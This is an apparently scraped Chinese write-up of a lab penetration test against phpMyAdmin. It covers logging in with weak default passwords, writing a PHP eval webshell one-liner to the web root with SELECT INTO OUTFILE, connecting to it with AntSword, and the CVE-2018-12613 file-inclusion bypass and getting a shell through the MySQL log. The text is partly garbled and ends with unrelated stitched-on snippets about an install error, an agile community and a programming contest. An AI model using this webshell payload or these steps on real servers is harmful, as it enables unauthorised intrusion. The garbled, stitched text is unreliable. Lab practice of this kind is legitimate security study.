第1站 phpMyAdmin測試

2021-10-20 14:18:59 字數 1810 閱讀 3139

其它總結

參考phpmyadmin登入:弱口令方式,root/空,root/root。

成功登入phpmyadmin後檢視靶場環境:

檢視root的【賬戶】,擁有增刪使用者的許可權:

1、嘗試使用into outfile匯出木馬到新建檔案:

檢視絕對路徑:select @@basedir;

使用into outfile匯出木馬(知道**的絕對路徑):

select 『<?php @eval($_post[here]);?>』 into outfile 『/var/www/html/here.php』

(忘記閉合小括號導致又執行了一次正確的語句)

(對於windows伺服器,路徑例如: 『d:\soft\phpstudy\www\***.php』;)

一句話木馬位置:起初以為phpmyadmin和http不在乙個埠,但訪問219.153.49.228、219.153.49.228:80、219.153.49.228:8080都顯示超時。嘗試訪問成功找到木馬位置,可知該http服務也執行在40366埠。

使用antsword連線成功:

2、 phpmyadmin 4.8.1 遠端檔案包含漏洞(cve-2018-12613)

影響範圍:phpmyadmin 4.8.0和4.8.1。

ctf遇到過這個漏洞,漏洞點是:?擷取導致的白名單繞過,以及目錄穿越導致的任意檔案包含。

利用條件:登入phpmyadmin。知道要讀取的檔案的路徑。

大概場景:phpmyadmin團隊考慮到,引數page的值後面再跟引數的情況,即可能會向所包含的檔案傳遞引數。使用?作為分隔符取引數page的首部,以便在page帶有引數的情況下也能正確地包含檔案。

目錄穿越-檔名解析:在win10建立檔案,發現/和?無法作為檔名,但是%可以。也就是說,如果檔名中包含/,那麼就會被php當作目錄處理。

場景利用:我們可以把白名單檔案sql.php當作乙個目錄,通過目錄穿越來包含指定的檔案,使實現檔案包含漏洞。

登入後,在/index.php中傳遞引數target,引數包含白名單檔名、通過目錄穿越想要讀取的檔案,比如

除了讀取phpinfo.php等任意檔案,還可以包含木馬檔案、日誌包含等拿shell。

(1)登入phpmyadmin後利用mysql日誌檔案

mysql 5.0版本以上會建立日誌檔案,通過修改日誌的全域性變數,也可以getshell。但是也要對生成的日誌有可讀可寫的許可權。(注:linux因為許可權問題沒有成功)

(2)《cve-2016-5734 phpmyadmin後台**執行漏洞復現漏洞利用條件:成功登入phpmyadmin,進入操作頁面。

測試安裝phpmyadmin4 0

在測試環境準備測試安裝phpmyadmin,測試環境上為一台zabbix 3.4的伺服器,已經安裝lamp環境。tue aug 15 15 17 47 2017 error client 172.17.6.57 php parse error syntax error,unexpected in v...

攜程敏捷加油站 第1期

這裡是攜程技術中心pmo,我們會在這裡分享專案管理心得和經驗。敏捷總動員是由攜程技術管理中心發起的敏捷社群活動,致力於為廣大敏捷愛好者提供高效的敏捷開發交流學習途徑,在上海技術圈子內推廣敏捷開發思想和實踐,幫助企業更好的實施敏捷。力爭做上海最具影響力的敏捷社群!努力成為上海最具影響力的pmo組織!敏...

myc歸來!(1)第2次測試

前段時間家裡電腦壞了,啥都幹不了。今天終於好了 來張康娜壓壓驚 閒話不多說,最近又考了好幾次試,我考得都快去見小奏 立華奏 了 t1 fj 又是他。做了一套服裝,打算給他的牛穿。這套服裝需要兩頭牛穿,每頭牛有乙個長度,兩頭牛的總長度不能超過這套服裝所能容納的長度,問有多少種穿法?思路 從小到大排序,...